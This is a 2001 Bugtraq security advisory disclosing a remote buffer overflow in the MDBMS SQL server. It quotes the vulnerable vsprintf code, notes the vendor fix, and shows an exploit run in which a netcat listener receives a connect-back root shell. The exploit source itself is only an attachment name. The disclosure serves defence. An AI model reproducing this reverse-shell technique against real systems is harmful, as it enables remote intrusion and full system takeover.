Remote buffer overflow in MDBMS.

[teleh0r -]

Dear bugtraq readers,
 
MDBMS is a SQL database server (currently) for UNIX systems.
Version 0.99b9 and below versions contain an exploitable
buffer overflow in the handling of the \s console command.
 
When a user passes large buffers to the server in the form
of multiple lines, these are appended to the end of each
other. A subsequent call to the \s command causes the
overflow.
 
Below is faulty code (from interface.cc):
 
void user::uprintf(char *s, ...)
{
  char b[10000];
  int len=strlen(outbuf), newlen;
  va_list ap;
  va_start(ap,s);
  vsprintf(b,s,ap); <----
  va_end(ap);
  newlen=strlen(b);
  while (newlen+len+10>=outsize) outbuf=(char*)realloc(outbuf,outsize+=1000);
  strcat(outbuf,b);
  FD_SET(fd,&parent->wmask);
}
 
mu-b also found a buffer overflow in the "create database"
system. This was actually caused by a sprintf that generated
the name of the management variable. This has been fixed -
now table and database names can no longer be larger than
128 bytes.
 
Information about the overflows was sent to [EMAIL PROTECTED]
He has now fixed the problems, and new versions of MDBMS can
be found at: http://www.hinttech.com/mdbms/
 
We would like to thank Marty for kind response and quick update.
 
Exploit example:
----------------
 
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl
 
-- Remote code execution exploit - MDBMS <= 0.99b
-- <[EMAIL PROTECTED]> - Copyright (c) 2001
 
Usage: ./mdbms-pms.pl -t <hostname> -b <back>
 
     -t <hostname>    : hostname to test
     -b <back>        : connect back to ip
     -p <port>        : port (default: 2223)
     -d <delay>       : delay before timeout
     -o <offset>      : offset
     -h               : return to heap
 
[teleh0r@localhost mdbms]$ nc -l -v -p 1337 &
[1] 2070
listening on [any] 1337 ...
 
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl -t 127.1 -b localhost -h
 
-- Remote code execution exploit - MDBMS <= 0.99b
-- <[EMAIL PROTECTED]> - Copyright (c) 2001
 
-> Connected to: 127.1 / MDBMS V0.99b9 ready.
-> Address : 0x302027d / xor-mask: 0x2020202
-> Return  : 0x80cfe76 / using the heap ...
-> Sending payload: ...
 
-> * Successfully sent payload - good luck!
 
connect to [127.0.0.1] from localhost.localdomain [127.0.0.1] 1189
[teleh0r@localhost mdbms]$ %
nc -l -v -p 1337
whoami; uname -mnrsp
root
Linux localhost.localdomain 2.4.2-2 i686 unknown
...
 
Exploit code attached.
 
Sincerely yours,
teleh0r and mu-b

--
To avoid criticism, do nothing, say nothing, be nothing.
                 -- Elbert Hubbard

mdbms.tar.gz